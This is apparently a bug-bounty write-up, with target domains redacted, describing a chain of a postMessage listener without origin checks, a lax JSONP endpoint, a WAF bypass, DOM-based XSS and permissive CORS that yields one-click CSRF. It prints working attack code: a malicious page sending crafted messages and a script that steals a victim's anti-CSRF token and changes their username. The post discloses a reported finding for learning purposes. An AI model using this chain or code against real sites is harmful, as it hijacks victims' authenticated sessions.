A few months ago, while hunting on a public bug-bounty programme, I found a nice little bug chain that involved

  • an insecure message event listener,
  • a shoddy JSONP endpoint,
  • a WAF bypass,
  • DOM-based XSS on an out-of-scope subdomain,
  • a permissive CORS configuration,

all to achieve CSRF against an in-scope asset. Read on for a deep dive about it.

Be aware that I’ve redacted some identifying information in order to protect the target organisation’s anonymity; I’ve also omitted some unimportant details in order to make the story of this bug chain more entertaining.

On the hunt for an elusive CSRF

The scope of my target’s bug-bounty programme was limited to and a few other subdomains of At that point, I had run out of ideas for finding vulnerabilities there. The possibility of an exploitable cross-site request forgery (CSRF) lingered in my mind, though…

I had noticed that some subdomains, such as, could perform sensitive actions (such as updating the authenticated user’s profile) by issuing POST requests to endpoints rooted at Authentication of such requests relied on ambient authority, in the form of a cookie named sid and marked SameSite=None and Secure.

Unfortunately, those endpoints required, as a defence against CSRF, the presence of a token (tied to the authenticated user’s session) in a query parameter named csrftoken. Client code running in the context of would retrieve that anti-CSRF token via an authenticated GET request to, which was accordingly configured for CORS.

Furthermore, I couldn’t find a straightforward way to steal that anti-CSRF token from my victim. In my quest for CSRF, I had seemingly hit a brick wall.

A permissive CORS policy drives me out of scope

When my progress on a target stalls like this, I typically start exploring out-of-scope assets in the hope of discovering and abusing a trust relationship they have with some in-scope assets. After further testing the endpoint, I realised that its CORS configuration allowed, not just origin, but any Web origin made up of some arbitrary subdomain of

$ curl -sD - -o /dev/null \
  -H "Origin:" \
  -H "Cookie: sid=xxx-yyy-zzz" \
HTTP/1.1 200 OK
Vary: Origin

Therefore, if I could discover an instance of cross-site scripting (XSS) on any subdomain (even an out-of-scope one), I would be able to steal my victim’s anti-CSRF token and then mount CSRF attacks against endpoints. With this plan in mind, I set out to scrutinise out-of-scope subdomains of

Insecure message event listener on out-of-scope subdomain

Equipped with Frans Rosén’s excellent postMessage-tracker Chrome extension, I quickly homed in on, which had an intriguing listener on 'message' events:

function handleMessageEvent(e) {
  try {
    var t = e;
    if (void 0 !== && (t =, "string" == typeof t) {
      try {
        t = JSON.parse(t)
      } catch (e) {
        return !1
    if (void 0 === t.method) return !1;
    var n, r = t.method.split(".");
    if (!(r.length > 0 && "APP" === r[0])) return !1;
    n = window;
    for (var a = 0; a < r.length; a++) {
      if (void 0 === n[r[a]]) {
        throw APP.Exception("COMMUNICATION_SECURITY");
      n = n[r[a]]
    if ("function" != typeof n) {
      throw APP.Exception("COMMUNICATION_SECURITY");
  } catch (e) {
  return !1

The conspicuous absence of an origin check from that event listener implies that any malicious page (deployed anywhere on the Web) that holds a reference to a document whose location is can send that document malicious Web messages, and those messages would unconditionally get accepted and processed. With what impact? That entirely depends on the logic of the listener. A casual static analysis of the code indicates that, on its “happy path”, the message event listener does the following:

  1. Parse the event’s data property as JSON and stored the result in an object named t.
  2. Split the method property on periods.
  3. Use the result of step 2 to iteratively access nested properties of some window.APP object (declared elsewhere in the client).
  4. Call the function thus obtained and passes it a property named arg of object t (see step 1) as argument.

In summary, my malicious page could send a specially crafted Web message to in order to trigger the execution of some malicious JavaScript code in the context of Web origin For instance, consider the following string:

`{"method": "","arg": "qux"}`

On the condition that expression be defined and actually be a function, sending the aforementioned string as a Web message to would lead the latter to execute the following JavaScript code:'qux')

Unfortunately, the listener’s logic limited this vector for DOM-based XSS to calls to functions accessible through the window.APP object, and with a single arbitrary argument of type string. Try as I may, I couldn’t find a way to access powerful DOM functionalities like eval or Function’s constructor in order to escalate this finding to unrestricted DOM-based XSS. Faced with this constraint, I had no other option than to painstakingly explore the properties of the window.APP object.

Perhaps a simpler solution escaped me then; I have no doubt that perceptive readers who are XSS experts or who simply have perused Gareth Heyes’s recently released book, JavaScript for Hackers, will point one out to me. Gareth, I promise you that your book is next on my reading list!

Setting cookies across origins, to no avail

A function named APP.util.setCookie immediately stood out. As its name implies, it allowed callers to set arbitrary cookies on the domain. For example, a malicious cross-origin page could set a cookie named foo with value bar on like so:

const win ='');
// omitted: wait a few seconds for the page to load
const msg = `{"method":"APP.util.setCookie", "arg":"foo=bar"}`;
win.postMessage(msg, '*');

The ability to set cookies across Web origins often helps Web attackers gain a foothold on their target: it may allow them to achieve session fixation, unlock otherwise seldom exploitable cookie-based XSS, defeat some implementations of the double-submit-cookie defence against CSRF, etc. Sadly, I could not find a way to abuse that APP.util.setCookie function to cause real damage.

A shoddy JSONP endpoint leads to DOM-based XSS

However, a function named window.APP.apiCall eventually caught my eye:

function apiCall(t, n, r, a) {
    try {
        "/" !== t[0] && (t = "/" + t);
        var o = t.split("?"),
            i = [];
        if (o.length > 1 && (t = o[0],
                i = o[1].split("&")),
            t = "" + t,
            "get" !== n && i.push("request_method=" + n),
            null !== r)
            for (var c in r)
                ({}), c) &&
                  i.push(c + "=" + encodeURIComponent(r[c]));
            null !== e.token && i.push("access_token=" + e.token),
            i.push("version=js-v" + e._version),
                path: t,
                path_args: i,
                callback: a,
                callback_name: "callback"
    } catch (t) {

I’ll spare you from the labyrinthine and irrelevant details of that function. Only two observations about window.APP.apiCall matter:

  • window.APP.apiCall is designed to send a request to a JSONP endpoint on and load the response as an external script (in the context of Web origin; and
  • window.APP.apiCall doesn’t build the JSONP URL in a particularly secure way.

Further dynamic tests on this JSONP endpoint revealed that it was protected by Akamai’s Web-application firewall (WAF). But I serendipitously discovered that, thanks to some questionable URL parsing on the server side, this obstacle could easily be bypassed. For an illustrative example, consider this first request and its 403 response from Akamai:

HTTP/2 403 Forbidden
Server: AkamaiGHost

Now consider this second request (note the absence of a ? marking the beginning of the URL’s querystring) and its 200 response from the origin server:

HTTP/2 200
Server: Apache
Content-Length: 59
Content-Type: text/javascript; charset=utf-8

alert({"error":{"msg":"Unknown path components: \/get"}})

Moreover, the JSONP endpoint was very lenient in the validation of its callback; on the condition that the value of the callback query parameter be (fully) doubly URL-encoded, the JSONP endpoint would accept it:

HTTP/2 200
Content-Type: text/javascript; charset=utf-8

alert('xss')//({"error":{"msg":"Unknown path components: \/get"}})

Happy days! I could now craft a malicious page that would send a Web message to designed to trick the latter into hitting the JSONP endpoint with a payload of my choice. And as a result, I could get arbitrary JavaScript code (e.g. alert(document.domain)) to execute in the context of Web origin

const url = '';
const win =;
// omitted: wait a few seconds for the page to load
const msg = {
  'method': 'APP.apiCall',
  'arg': '&callback=alert%2528document.domain%2529%252f%252f&output=jsonp#'
win.postMessage(JSON.stringify(msg), '*');

Now armed with this unrestricted DOM-based XSS on Web origin (which, as you may recall, was allowed in the CORS configuration of the resource), I had a way to steal my victim’s anti-CSRF token.

The need for one-click user interaction

In order to send Web messages to their intended destination (, my malicious page first needed to acquire a reference to either an iframe or a window opened on that page. Unfortunately, cross-origin framing of was out of the question because all of my target’s responses invariably contained the following header:

X-Frame-Options: SAMEORIGIN

However, I could instead design my malicious page to open in a pop-up window at the expense of a modicum of user interaction—necessary for bypassing the browser’s pop-up blocker—such as clicking a button.

Putting it all together for a one-click CSRF

I deployed the following static page to

<!doctype html>
    <meta charset="utf-8">
      function encode(str) {
        return encodeURIComponent(str).replace(
          (c) => `%${c.charCodeAt(0).toString(16).toUpperCase()}`,
      var win;
      function sendMsg() {
        const url = new URL("");
        if (typeof win === 'undefined') {
           win = open(url);
        const delayMs = 2000;
        const payload = new URLSearchParams(
        setTimeout(() => {
          const doubleEncodedPayload = encode(encode(`${payload}//`));
          const msg = {
            'method': 'APP.apiCall',
            'arg': `&callback=${doubleEncodedPayload}&output=jsonp#`
          win.postMessage(JSON.stringify(msg), url.origin);
        }, delayMs);
    <input type=button value="Click me!" onclick="sendMsg();">

The page consists of a single button, a click on which would cause my malicious payload to execute on Note that, for testing purposes, I opted to parameterise the malicious payload via a query parameter named payload. I also deployed the following JavaScript file to

async function stealToken() {
  const url = '';
  const opts = {method: 'POST', credentials: 'include'};
  return await fetch(url, opts)
    .then(body => body.json())
    .then(data => data.csrftoken);
async function csrf() {
  const token = await stealToken();
  const url = `${token}`;
  const randomString = (Math.random() + 1).toString(36).substring(7);
  const data = {'username':`PWNED_${randomString}`};
  const opts = {
    method: 'POST',
    credentials: 'include',
    body: JSON.stringify(data)
fetch(url, opts);

I could then lure a victim authenticated on to the following URL:

If my victim subsequently clicked the button, she would unwittingly update her username on to a telltale value of something like PWNED_ysp4d.


I promptly reported my findings through my target’s bug-bounty programme with a CVSS vector of AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N (7.1 High). According to their reward table, High paid just under €1,000. I was hopeful that, despite the need for user interaction, my perseverance and the complexity of my bug chain would compel the triage team to throw in a small bonus for good measure.

Unfortunately, the gnarliest bug chains don’t always turn out to be lucrative. For my report, I only got the princely sum of €200. And despite my repeated calls for a justification, the programme remained dead silent. You won’t be surprised to learn that I have no plans to spend any more time on that programme until they reassess their reward policy.

Ultimately, knowledge is its own reward, I suppose. If anything, this bug chain reinforced my belief that going out of scope is hardly ever a pointless exercise.


Thanks to renniepak and Tara Cooke, who both kindly agreed to review an early draft of this post.